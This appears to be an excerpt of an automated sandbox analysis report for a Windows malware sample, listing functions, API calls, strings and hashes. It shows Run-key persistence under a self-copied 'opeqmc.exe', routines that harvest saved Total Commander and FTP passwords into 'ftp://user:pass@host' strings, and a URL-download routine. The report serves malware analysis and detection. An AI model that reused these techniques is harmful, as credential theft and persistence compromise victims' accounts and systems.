Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

Uniqueness

Uniqueness Score: -1.00%

Function 0040B346 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 153
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D

Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22

GetLastError.KERNEL32(00000004), ref: 0040B3CA
Sleep.KERNEL32(00002710), ref: 0040B3F7
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
ExitProcess.KERNEL32 ref: 0040B44D

Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

GetLastError.KERNEL32(00000004), ref: 0040B48D
GetLastError.KERNEL32(00000004), ref: 0040B49A
ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
GetLastError.KERNEL32(00000004), ref: 0040B500

Strings

/nomove, xrefs: 0040B4D9
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040B3AD
opeqmc.exe, xrefs: 0040B36E
IueiOod, xrefs: 0040B3A8

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
API String ID: 3692109554-477663111
Opcode ID: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
Opcode Fuzzy Hash: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

Strings

/nomove, xrefs: 0040AC23
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040AC39, 0040AC3E, 0040AC6C
IueiOod, xrefs: 0040AC50, 0040AC82

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
API String ID: 3546245721-4228964922
Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60

Strings

/nomove, xrefs: 0040AB10

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CharLower$CommandFileLineModuleName
String ID: /nomove
API String ID: 1338073227-1111986840
Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

Uniqueness

Uniqueness Score: -1.00%

Function 00407727 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
GetLastError.KERNEL32(00000004), ref: 004077A9

Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
String ID:
API String ID: 1536607067-0
Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

Uniqueness

Uniqueness Score: -1.00%

Function 004077F0 Relevance: 3.0, APIs: 2, Instructions: 30
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00407800
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CreateProcess_memset
String ID:
API String ID: 1177741608-0
Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

Uniqueness

Uniqueness Score: -1.00%

Function 004069C0 Relevance: 3.0, APIs: 2, Instructions: 25
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004039EA Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 163
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
StrStrIW.SHLWAPI(?,?), ref: 00403ACF
StrStrIW.SHLWAPI(?,?), ref: 00403AE4
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36

Strings

username, xrefs: 00403AA9
connections, xrefs: 00403A79
SOFTWARE\Ghisler\Total Commander, xrefs: 004039F3
default, xrefs: 00403A8B
password, xrefs: 00403AB8
ftp://%s:%s@%s, xrefs: 00403B50
host, xrefs: 00403A9A

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: PrivateProfileString$AllocHeap
String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
API String ID: 2479592106-2015850556
Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

Uniqueness

Uniqueness Score: -1.00%

Function 004032B8 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 86
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C

Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A

GetSystemMetrics.USER32(00000000), ref: 004032E5
GetSystemMetrics.USER32(00000001), ref: 004032ED
VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377

Strings

AtlAxGetControl, xrefs: 0040336C
AtlAxAttachControl, xrefs: 0040335F
AtlAxWinInit, xrefs: 00403357
atl, xrefs: 00403340

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
API String ID: 3066332896-2664446222
Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79

Uniqueness

Uniqueness Score: -1.00%

Function 00408248 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 116sleepfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Sleep.KERNEL32(00000000), ref: 00408342
Sleep.KERNEL32(00000000), ref: 00408377
FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
FindClose.KERNEL32(00000000), ref: 004083B9

Strings

.8@, xrefs: 0040833F
@@, xrefs: 0040825E
., xrefs: 004082B7
.8@, xrefs: 00408379
., xrefs: 004082CE

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID: .$.$.8@$.8@$@@
API String ID: 2348139788-3828113974
Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040350F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681

Strings

user, xrefs: 00403601
port, xrefs: 004035F1
ftp://%s:%s@%s:%u, xrefs: 004036C3
pass, xrefs: 00403611

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: PrivateProfile$String$AllocHeap$CombinePath
String ID: ftp://%s:%s@%s:%u$pass$port$user
API String ID: 3432043379-2696999094
Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56

Uniqueness

Uniqueness Score: -1.00%

Function 00407036 Relevance: 16.6, APIs: 11, Instructions: 97filenetworkCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
GetLastError.KERNEL32(00000000), ref: 00407079
SetEndOfFile.KERNEL32(00000000), ref: 0040708F
InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
CloseHandle.KERNEL32(00000000), ref: 004070BB

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
String ID:
API String ID: 3711279109-0
Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00401C41 Relevance: 11.7, Strings: 9, Instructions: 462COMMON

Download Yara Rule

Strings

&kwtype=, xrefs: 0040210A
0, xrefs: 0040214E
0, xrefs: 00401C87
&ref=%s&real_refer=%s, xrefs: 00401DAE, 00401F12
&real_refer=%s, xrefs: 00401DCB, 00401F2F
&condition_id=, xrefs: 004020AE
0, xrefs: 00402175
0, xrefs: 00401E62
&ref=%s, xrefs: 004021B8

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID:
String ID: &condition_id=$&kwtype=$&real_refer=%s$&ref=%s$&ref=%s&real_refer=%s$0$0$0$0
API String ID: 0-2992689389
Opcode ID: f118b9fb71cfb78005f5506091eb1ec0394b7ad0f1bd3af93ebbb6a5fa6d69e0
Instruction ID: e592e17ffd072e5ed7288f56bd6294cd549ee2c695a1c784d027d9705cc039a8
Opcode Fuzzy Hash: f118b9fb71cfb78005f5506091eb1ec0394b7ad0f1bd3af93ebbb6a5fa6d69e0
Instruction Fuzzy Hash: B2F1E272810118AADB14EB61DC919EF737EEF01304F5044BBFA09B62D1E7789E858F99

Uniqueness

Uniqueness Score: -1.00%

Function 00407499 Relevance: 9.1, APIs: 6, Instructions: 62timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?), ref: 004074AD
GetLocalTime.KERNEL32(00000000), ref: 004074B3
GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
String ID:
API String ID: 3777474486-0
Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407267 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
__aulldiv.LIBCMT ref: 004072E3

Strings

c{@, xrefs: 004072D3

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: Time$System$File$__aulldiv
String ID: c{@
API String ID: 3735792614-264719814
Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD66 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0040D0C4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
TerminateProcess.KERNEL32(00000000), ref: 0040D107

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A057 Relevance: 4.5, APIs: 3, Instructions: 40comCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00427ED0,00427ED0,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A065
CoCreateInstance.OLE32(0040E218,00000000,00000015,0040E238,00000001,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A07E
SetForegroundWindow.USER32(00000000), ref: 0040A088

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

